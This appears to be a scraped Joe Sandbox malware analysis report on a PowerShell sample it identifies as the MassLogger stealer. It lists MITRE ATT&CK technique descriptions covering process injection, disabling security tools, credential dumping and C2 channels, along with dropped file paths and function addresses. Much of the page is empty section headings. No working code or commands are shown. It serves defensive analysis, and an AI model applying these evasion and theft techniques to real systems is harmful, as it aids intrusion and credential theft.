Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report jqxrkk.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: MassLogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Networking

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yzksvw1.04c.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bxcbnnbs.ryi.ps1

C:\Users\user\AppData\Local\Temp\x.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ML1W4V45D12ZJBQ4EM4W.temp

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
jqxrkk.ps1

Function 00C257CC Relevance: 1.8, APIs: 1, Instructions: 341
processCOMMON

Function 00C26374 Relevance: 1.8, APIs: 1, Instructions: 341
processCOMMON

Function 00C2583C Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Function 00C270D0 Relevance: 1.6, APIs: 1, Instructions: 117
injectionCOMMON

Function 00C26D28 Relevance: 1.6, APIs: 1, Instructions: 115
memoryCOMMON

Function 00C2580C Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Function 00C26B20 Relevance: 1.6, APIs: 1, Instructions: 106
COMMON

Function 00C25824 Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Function 00C25854 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Function 00C257E4 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Function 00C21BD1 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Function 00C21BD8 Relevance: 1.6, APIs: 1, Instructions: 94
memoryCOMMON

Function 00C26990 Relevance: 1.6, APIs: 1, Instructions: 94
threadCOMMON

Function 00C2586C Relevance: 1.6, APIs: 1, Instructions: 74
threadCOMMON

Function 00C27470 Relevance: 1.6, APIs: 1, Instructions: 73
threadCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre